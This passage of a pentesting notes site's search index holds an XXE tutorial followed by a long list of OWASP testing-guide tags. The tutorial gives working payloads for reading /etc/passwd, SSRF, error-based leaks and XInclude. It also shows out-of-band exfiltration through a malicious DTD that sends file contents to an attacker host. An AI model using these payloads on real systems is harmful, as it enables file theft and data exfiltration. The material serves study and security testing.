                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#tools-and-payloads","title":"Tools and payloads","text":"
                                            • See updated chart: Attacks and tools for web pentesting.
• A detailed cheat sheet with manual union and blind attacks can be found in the SQLi Cheat sheet for manual attack.

                                            • https://portswigger.net/web-security/sql-injection/cheat-sheet.

                                            • https://github.com/payloadbox/sql-injection-payload-list.
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/xml-external-entity-xee/","title":"XXE - XEE XML External Entity attacks","text":"Sources
                                            • HackTricks.
• PortSwigger.
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#basic-concepts","title":"Basic concepts","text":"","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-it-xml","title":"What it XML?","text":"

                                            XML stands for \"extensible markup language\". XML is a language designed for storing and transporting data. Like HTML, XML uses a tree-like structure of tags and data. Unlike HTML, XML does not use predefined tags, and so tags can be given names that describe the data.

                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-are-xml-entities","title":"What are XML entities?","text":"

XML entities are a way of representing an item of data within an XML document, instead of using the data itself. Various entities are built into the specification of the XML language. For example, the entities &lt; and &gt; represent the characters < and >. These are metacharacters used to denote XML tags, and so must generally be represented using their entities when they appear within data.

                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-are-xml-elements","title":"What are XML elements?","text":"

                                            Element type declarations set the rules for the type and number of elements that may appear in an XML document, what elements may appear inside each other, and what order they must appear in. For example:

<!ELEMENT root ANY> Means that any object could be inside the parent <root></root>\n\n<!ELEMENT root EMPTY> Means that it should be empty <root></root>\n\n<!ELEMENT root (name,password)> Declares that <root> can have the children <name> and <password>\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-is-document-type-definition","title":"What is document type definition?","text":"

The XML document type definition (DTD) contains declarations that can define the structure of an XML document, the types of data values it can contain, and other items. The DTD is declared within the optional DOCTYPE element at the start of the XML document. The DTD can be fully self-contained within the document itself (known as an \"internal DTD\") or can be loaded from elsewhere (known as an \"external DTD\") or can be a hybrid of the two.

                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#how-xml-custom-entities-work","title":"How XML custom entities work?","text":"

                                            XML allows custom entities to be defined within the DTD. For example:

                                            <!DOCTYPE foo [ <!ENTITY myentity \"my entity value\" > ]>\n

                                            This definition means that any usage of the entity reference &myentity; within the XML document will be replaced with the defined value: \"my entity value\".

                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-are-xml-external-entities","title":"What are XML external entities?","text":"

                                            XML external entities are a type of custom entity whose definition is located outside of the DTD where they are declared. The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded. For example:

                                            <!DOCTYPE foo [ <!ENTITY ext SYSTEM \"http://normal-website.com\" > ]>\n

The URL can use the file:// protocol, and so external entities can be loaded from a file. For example:

<!DOCTYPE nameThatYouWant [ <!ENTITY nameofEntity SYSTEM \"file:///path/to/file\" > ]>\n<root>\n    <name>&nameofEntity;</name>\n    <password>1</password>\n</root>\n\n# nameThatYouWant: string with the name that you want\n# nameofEntity: we will call the entity using this name\n# <!ENTITY: there might be more than one entity defined\n# SYSTEM: allows us to call the entity\n# file:// -> to call an internal value. Instead of file:// we can also use:\n    # http://\n    # ftp://\n    # ssh://\n    # php://\n# &nameofEntity;  -> this is how you request the entity\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#classic-xml-external-entity","title":"Classic XML External Entity","text":"
# Classic XXE\n<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\" > ]>\n<name>&xxe;</name>\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#base-encoded-xml-external-entity","title":"Base-encoded XML External Entity","text":"
# Base64-encoded XXE\n<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=file:///etc/passwd\" > ]>\n<name>&xxe;</name>\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#blind-xml-external-entity-out-of-band","title":"Blind XML External Entity - Out of Band","text":"
                                            # Blind XXE 1\n<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"file:///etc/passwd\"> %xxe; ]>\n
                                            # Blind XXE 2\n<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"http://malicious.com/exploit\"> %xxe; ]>\n\n    # http://malicious.com/exploit will contain another entity such as \n<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"file:///etc/passwd\"> %xxe; ]>\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#but-why-external-entities-are-accepted","title":"But why external entities are accepted","text":"

This is a snippet of PHP code that accepts external DTDs:

<?php\n\nlibxml_disable_entity_loader (false);\n// libxml_disable_entity_loader (true);\n\n$xmlfile = file_get_contents('php://input');\n$dom = new DOMDocument();\n$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);\n$info = simplexml_import_dom($dom);\n$name = $info->name;\n$password = $info->password;\n\necho \"Sorry, this $name is not available\";\n?>\n

Allowing external DTDs is done in this line:

                                            libxml_disable_entity_loader (false);\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#main-attacks","title":"Main attacks","text":"","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#new-entity-test","title":"New Entity test","text":"

                                            In this attack I'm going to test if a simple new ENTITY declaration is working:

                                            <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE foo [<!ENTITY toreplace \"3\"> ]>\n<stockCheck>\n    <productId>&toreplace;</productId>\n    <storeId>1</storeId>\n</stockCheck>\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#1-retrieve-files","title":"1. Retrieve files","text":"

                                            Modify the submitted XML in two ways:

                                            • Introduce (or edit) a\u00a0DOCTYPE\u00a0element that defines an external entity containing the path to the file.
                                            • Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.

In a Windows system, we may use c:/windows/system32/drivers/etc/hosts:

                                            POST /process.php HTTP/1.1\nHost: 10.129.95.192\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: text/xml\nContent-Length: 192\nOrigin: http://10.129.95.192\nConnection: close\nReferer: http://10.129.95.192/services.php\nCookie: PHPSESSID=1gjqt353d2lm5222nl3ufqru10\n\n<?xml version = \"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/system32/drivers/etc/hosts'>]>\n<order>\n    <quantity>2</quantity>\n    <item>&test;</item>\n    <address>1</address>\n</order>\n

On a Linux server, go for:

                                            # example 1\n<?xml version = \"1.0\"?><!DOCTYPE foo [<!ENTITY example1 SYSTEM \"/etc/passwd\"> ]>\n<order>\n    <quantity>2</quantity>\n    <item>&example1;</item>\n    <address>1</address>\n</order>\n\n\n# example 2\n<?xml version = \"1.0\"?><!DOCTYPE foo [ <!ENTITY example2 SYSTEM \"file:///etc/passwd\" > ]>\n<order>\n    <quantity>2</quantity>\n    <item>&example2;</item>\n    <address>1</address>\n</order>\n

                                            Encoding techniques

# Base64-encoded XXE\n<?xml version = \"1.0\"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=file:///etc/passwd\" > ]>\n<name>&xxe;</name>\n

This filter returns the file base64-encoded, avoiding data loss and truncation.

                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#2-chaining-xxe-to-ssrf-attacks","title":"2. Chaining XXE to SSRF attacks","text":"

                                            To exploit an XXE vulnerability to perform an SSRF attack, you need to define an external XML entity using the URL that you want to target, and use the defined entity within a data value.

                                            <?xml version = \"1.0\"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"http://internal.vulnerable-website.com/\"> ]>\n

                                            You would then make use of the defined entity in a data value within the XML.

                                            See this lab with an example of exploitation

                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#3-blind-xxe-vulnerabilities","title":"3. Blind XXE vulnerabilities","text":"

                                            Sometimes the application does not return the values of any defined external entities in its responses, and so direct retrieval of server-side files is not possible.

Blind XXE requires the use of out-of-band techniques: declare a parameter entity (for example %xxe) and reference it right after the ENTITY definition. XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD.

                                            <?xml version = \"1.0\"?><!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"http://internal.vulnerable-website.com/\"> %xxe;]>\n

                                            You don't need to make use of the defined entity in a data value within the XML as the %xxe; is already calling the entity.

                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#4-blind-xxe-with-data-exfiltration-out-of-band-blind-xxe-with-oob-data-exfiltration","title":"4. Blind XXE with data exfiltration out-of-band (Blind XXE with OOB data exfiltration)","text":"

                                            1. Create a malicious.dtd file:

                                            <!ENTITY % file SYSTEM \"file:///etc/passwd\"> \n<!ENTITY % eval \"<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>\"> %eval; %exfiltrate;\n
Basically, malicious.dtd retrieves /etc/passwd from the instance on which it is executed.

2. Serve our malicious.dtd from http://attacker.com/malicious.dtd.

3. Submit a payload to the victim via XXE (blind) with an XML parameter entity.

                                            <!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://attacker.com/malicious.dtd\"> %xxe;]>\n

                                            This will cause the XML parser to fetch the external DTD from the attacker's server and interpret it inline.

                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#5-blind-xxe-to-retrieve-data-via-error-messages","title":"5. Blind XXE to retrieve data via error messages","text":"

                                            An alternative approach to exploiting blind XXE is to trigger an XML parsing error where the error message contains the sensitive data that you wish to retrieve.

                                            • Trigger an XML parsing error message containing the contents of the\u00a0/etc/passwd\u00a0file using a malicious external DTD as follows:
                                            <!ENTITY % file SYSTEM \"file:///etc/passwd\"> <!ENTITY % eval \"<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>\"> %eval; %error;\n

                                            Invoking the malicious external DTD may result in an error message like the following:

                                            java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#6-blind-xxe-by-repurposing-a-local-dtd","title":"6. Blind XXE by repurposing a local DTD","text":"

                                            If a document's DTD uses a hybrid of internal and external DTD declarations, then the internal DTD can redefine entities that are declared in the external DTD. When this happens, the restriction on using an XML parameter entity within the definition of another parameter entity is relaxed.

                                            Essentially, the attack involves invoking a DTD file that happens to exist on the local filesystem and repurposing it to redefine an existing entity in a way that triggers a parsing error containing sensitive data.

                                            For example, suppose there is a DTD file on the server filesystem at the location\u00a0/usr/local/app/schema.dtd, and this DTD file defines an entity called\u00a0custom_entity. An attacker can trigger an XML parsing error message containing the contents of the\u00a0/etc/passwd\u00a0file by submitting a hybrid DTD like the following:

                                            <!DOCTYPE foo [ \n<!ENTITY % local_dtd SYSTEM \"file:///usr/local/app/schema.dtd\"> \n<!ENTITY % custom_entity ' \n<!ENTITY &#x25; file SYSTEM \"file:///etc/passwd\"> <!ENTITY &#x25; eval \"<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>\"> &#x25;eval; &#x25;error; '> \n%local_dtd; \n]>\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#7-xinclude-attack","title":"7. XInclude attack","text":"

                                            In the following scenario, we cannot implement a classic/blind/oob XXE attack because we don't control the entire XML document and so we cannot define the DOCTYPE element.

We can bypass this restriction with XInclude. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. We can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.

                                            For instance:

                                            <d0p xmlns:xi=\"http://www.w3.org/2001/XInclude\">\n<xi:include parse=\"text\" href=\"file:///etc/passwd\"/></d0p>\n

                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#8-xxe-via-file-upload","title":"8. XXE via file upload","text":"

In a file upload feature, if the application expects to receive a format like .png or .jpeg, the image processing library is likely to accept .svg too.

                                            Our XXE payload could be:

                                            <?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\" > ]><svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"><text font-size=\"16\" x=\"0\" y=\"16\">&xxe;</text></svg>\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#interesting-files","title":"Interesting files","text":"

• Interesting Windows files
• Interesting Linux files

                                            ","tags":["xxe"]},{"location":"tags/","title":"tags","text":"

                                            Following is a list of relevant tags:

                                            ","tags":["tags"]},{"location":"tags/#389","title":"389","text":"
                                            • Port 389 - 636 LDAP
                                            ","tags":["tags"]},{"location":"tags/#azure","title":"Azure","text":"
                                            • Pentesting Amazon Web Services (AWS)
                                            • Pentesting Azure
                                            ","tags":["tags"]},{"location":"tags/#cms","title":"CMS","text":"
                                            • Pentesting MyBB
                                            • pentesting wordpress
                                            ","tags":["tags"]},{"location":"tags/#cpts","title":"CPTS","text":"
                                            • CPTS index
                                            • 01. Information Gathering / Footprinting
                                            • Pentesting Notes
                                            ","tags":["tags"]},{"location":"tags/#cve-2015-6967","title":"CVE-2015-6967","text":"
                                            • Nibbles - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#dns-poisoning","title":"DNS poisoning","text":"
                                            • DNS poisoning
                                            ","tags":["tags"]},{"location":"tags/#dynamics","title":"Dynamics","text":"
• Pentesting OData
                                            ","tags":["tags"]},{"location":"tags/#http","title":"HTTP","text":"
                                            • CSRF attack - Cross Site Request Forgery
                                            ","tags":["tags"]},{"location":"tags/#microsoft-365","title":"Microsoft 365","text":"
                                            • M365 CLI
                                            ","tags":["tags"]},{"location":"tags/#mybb","title":"MyBB","text":"
                                            • Pentesting MyBB
                                            ","tags":["tags"]},{"location":"tags/#nfc","title":"NFC","text":"
                                            • Mifare Classic
                                            • Mifare Desfire
                                            • NFC - Setting up proxmark3 RDV4.01
                                            • Proxmark3 RDV4.01
                                            ","tags":["tags"]},{"location":"tags/#nfs","title":"NFS","text":"
                                            • Port 111, 32731 - rpc
                                            • Port 2049 - NFS Network File System
                                            • Port 43 - whois
                                            ","tags":["tags"]},{"location":"tags/#ntlm","title":"NTLM","text":"
                                            • HTTP Authentication Schemes
                                            ","tags":["tags"]},{"location":"tags/#ntlm-credential-stealing","title":"NTLM credential stealing","text":"
                                            • Responder - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#network-file-system","title":"Network File System","text":"
                                            • Port 111, 32731 - rpc
                                            • Port 2049 - NFS Network File System
                                            • Port 43 - whois
                                            ","tags":["tags"]},{"location":"tags/#nosql","title":"NoSQL","text":"
                                            • Mongo
                                            ","tags":["tags"]},{"location":"tags/#oscp","title":"OSCP","text":"
                                            • Password attacks
                                            ","tags":["tags"]},{"location":"tags/#openflow","title":"Openflow","text":"
                                            • 6653 Openflow
                                            ","tags":["tags"]},{"location":"tags/#openstack","title":"Openstack","text":"
                                            • Openstack Essentials
                                            ","tags":["tags"]},{"location":"tags/#rfid","title":"RFID","text":"
                                            • Mifare Classic
                                            • Mifare Desfire
                                            • RFID
                                            ","tags":["tags"]},{"location":"tags/#rfid-pentesting","title":"RFID pentesting","text":"
                                            • NFC - Setting up proxmark3 RDV4.01
                                            ","tags":["tags"]},{"location":"tags/#smtp","title":"SMTP","text":"
• Ports 25, 565, 587 - Simple Mail Transfer Protocol (SMTP)
• postfix - An SMTP server
                                            ","tags":["tags"]},{"location":"tags/#smtp-server","title":"SMTP server","text":"
• postfix - An SMTP server
                                            ","tags":["tags"]},{"location":"tags/#snmp","title":"SNMP","text":"
                                            • 161-162 SNMP Simple Network Management Protocol
                                            ","tags":["tags"]},{"location":"tags/#sql","title":"SQL","text":"
                                            • MariaDB
                                            • MySQL
                                            • sqlite
                                            • Virtual environments
                                            ","tags":["tags"]},{"location":"tags/#simple-mail-transfer-protocol","title":"Simple Mail Transfer Protocol","text":"
• Ports 25, 565, 587 - Simple Mail Transfer Protocol (SMTP)
                                            ","tags":["tags"]},{"location":"tags/#wstg-apit-01","title":"WSTG-APIT-01","text":"
                                            • Testing GraphQL - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-01","title":"WSTG-ATHN-01","text":"
                                            • Testing for Credentials Transported over an Encrypted Channel - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-02","title":"WSTG-ATHN-02","text":"
                                            • Testing for Default Credentials - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-03","title":"WSTG-ATHN-03","text":"
                                            • Testing for Weak Lock Out Mechanism - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-04","title":"WSTG-ATHN-04","text":"
                                            • Testing for Bypassing Authentication Schema - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-05","title":"WSTG-ATHN-05","text":"
                                            • Testing for Vulnerable Remember Password - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-06","title":"WSTG-ATHN-06","text":"
                                            • Testing for Browser Cache Weaknesses - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-07","title":"WSTG-ATHN-07","text":"
                                            • Testing for Weak Password Policy - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-08","title":"WSTG-ATHN-08","text":"
                                            • Testing for Weak Security Question Answer - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-09","title":"WSTG-ATHN-09","text":"
                                            • Testing for Weak Password Change or Reset Functionalities - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-10","title":"WSTG-ATHN-10","text":"
                                            • Testing for Weaker Authentication in Alternative Channel - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-11","title":"WSTG-ATHN-11","text":"
                                            • Testing Multi-Factor Authentication (MFA) - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athz-01","title":"WSTG-ATHZ-01","text":"
                                            • Testing Directory Traversal File Include - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athz-02","title":"WSTG-ATHZ-02","text":"
                                            • Testing for Bypassing Authorization Schema - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athz-03","title":"WSTG-ATHZ-03","text":"
                                            • Testing for Privilege Escalation - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athz-04","title":"WSTG-ATHZ-04","text":"
                                            • Testing for Insecure Direct Object References - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athz-05","title":"WSTG-ATHZ-05","text":"
                                            • Testing for OAuth Weaknesses - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-01","title":"WSTG-BUSL-01","text":"
                                            • Test Business Logic Data Validation - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-02","title":"WSTG-BUSL-02","text":"
                                            • Test Ability to Forge Requests - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-03","title":"WSTG-BUSL-03","text":"
                                            • Test Integrity Checks - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-04","title":"WSTG-BUSL-04","text":"
                                            • Test for Process Timing - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-05","title":"WSTG-BUSL-05","text":"
                                            • Test Number of Times a Function Can Be Used Limits - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-06","title":"WSTG-BUSL-06","text":"
                                            • Testing for the Circumvention of Work Flows - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-07","title":"WSTG-BUSL-07","text":"
                                            • Test Defenses Against Application Misuse - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-08","title":"WSTG-BUSL-08","text":"
                                            • Test Upload of Unexpected File Types - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-09","title":"WSTG-BUSL-09","text":"
                                            • Test Upload of Malicious Files - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-10","title":"WSTG-BUSL-10","text":"
                                            • Test Payment Functionality - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-01","title":"WSTG-CLNT-01","text":"
                                            • Testing for DOM-Based Cross Site Scripting - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-02","title":"WSTG-CLNT-02","text":"
                                            • Testing for JavaScript Execution - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-03","title":"WSTG-CLNT-03","text":"
                                            • Testing for HTML Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-04","title":"WSTG-CLNT-04","text":"
                                            • Testing for Client-side URL Redirect - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-05","title":"WSTG-CLNT-05","text":"
                                            • Testing for CSS Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-06","title":"WSTG-CLNT-06","text":"
                                            • Testing for Client-side Resource Manipulation - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-07","title":"WSTG-CLNT-07","text":"
                                            • Testing Cross Origin Resource Sharing - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-08","title":"WSTG-CLNT-08","text":"
                                            • Testing for Cross Site Flashing - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-09","title":"WSTG-CLNT-09","text":"
• Testing for Clickjacking - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-10","title":"WSTG-CLNT-10","text":"
                                            • Testing WebSockets - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-11","title":"WSTG-CLNT-11","text":"
                                            • Testing Web Messaging - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-12","title":"WSTG-CLNT-12","text":"
                                            • Testing Browser Storage - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-13","title":"WSTG-CLNT-13","text":"
                                            • Testing for Cross Site Script Inclusion - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-14","title":"WSTG-CLNT-14","text":"
                                            • Testing for Reverse Tabnabbing - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-01","title":"WSTG-CONF-01","text":"
                                            • Test Network Infrastructure Configuration - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-02","title":"WSTG-CONF-02","text":"
                                            • Test Application Platform Configuration - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-03","title":"WSTG-CONF-03","text":"
                                            • Test File Extensions Handling for Sensitive Information - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-04","title":"WSTG-CONF-04","text":"
                                            • Review Old Backup and Unreferenced Files for Sensitive Information - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-05","title":"WSTG-CONF-05","text":"
                                            • Enumerate Infrastructure and Application Admin Interfaces - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-06","title":"WSTG-CONF-06","text":"
                                            • Test HTTP Methods - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-07","title":"WSTG-CONF-07","text":"
                                            • Test HTTP Strict Transport Security - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-08","title":"WSTG-CONF-08","text":"
                                            • Test RIA Cross Domain Policy - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-09","title":"WSTG-CONF-09","text":"
                                            • Test File Permission - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-10","title":"WSTG-CONF-10","text":"
                                            • Test for Subdomain Takeover - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-11","title":"WSTG-CONF-11","text":"
                                            • Test Cloud Storage - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-12","title":"WSTG-CONF-12","text":"
                                            • Testing for Content Security Policy - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-13","title":"WSTG-CONF-13","text":"
                                            • Test Path Confusion - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-cryp-01","title":"WSTG-CRYP-01","text":"
                                            • Testing for Weak Transport Layer Security - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-cryp-02","title":"WSTG-CRYP-02","text":"
                                            • Testing for Padding Oracle - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-cryp-03","title":"WSTG-CRYP-03","text":"
                                            • Testing for Sensitive Information Sent via Unencrypted Channels - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-cryp-04","title":"WSTG-CRYP-04","text":"
                                            • Testing for Weak Encryption - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-errh-01","title":"WSTG-ERRH-01","text":"
                                            • Testing for Improper Error Handling - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-errh-02","title":"WSTG-ERRH-02","text":"
                                            • Testing for Stack Traces - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-idnt-01","title":"WSTG-IDNT-01","text":"
                                            • Test Role Definitions - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-idnt-02","title":"WSTG-IDNT-02","text":"
                                            • Test User Registration Process - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-idnt-03","title":"WSTG-IDNT-03","text":"
                                            • Test Account Provisioning Process - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-idnt-04","title":"WSTG-IDNT-04","text":"
                                            • Testing for Account Enumeration and Guessable User Account - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-idnt-05","title":"WSTG-IDNT-05","text":"
                                            • Testing for Weak or Unenforced Username Policy - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-01","title":"WSTG-INFO-01","text":"
                                             • Conduct Search Engine Discovery Reconnaissance for Information Leakage - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-02","title":"WSTG-INFO-02","text":"
                                            • nikto
                                            • Fingerprint Web Server - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-03","title":"WSTG-INFO-03","text":"
                                            • Review Webserver Metafiles for Information Leakage - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-04","title":"WSTG-INFO-04","text":"
                                            • Enumerate Applications on Webserver - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-05","title":"WSTG-INFO-05","text":"
                                             • Review Webpage Content for Information Leakage - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-06","title":"WSTG-INFO-06","text":"
                                            • Identify Application Entry Points - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-07","title":"WSTG-INFO-07","text":"
                                             • Map Execution Paths Through Application - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-08","title":"WSTG-INFO-08","text":"
                                            • Fingerprint Web Application Framework - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-09","title":"WSTG-INFO-09","text":"
                                            • Fingerprint Web Applications - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-10","title":"WSTG-INFO-10","text":"
                                             • Map Application Architecture - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-01","title":"WSTG-INPV-01","text":"
                                            • Testing for Reflected Cross Site Scripting - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-02","title":"WSTG-INPV-02","text":"
                                            • Testing for Stored Cross Site Scripting - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-03","title":"WSTG-INPV-03","text":"
                                            • Testing for HTTP Verb Tampering - OWASP Web Security Testing Guide
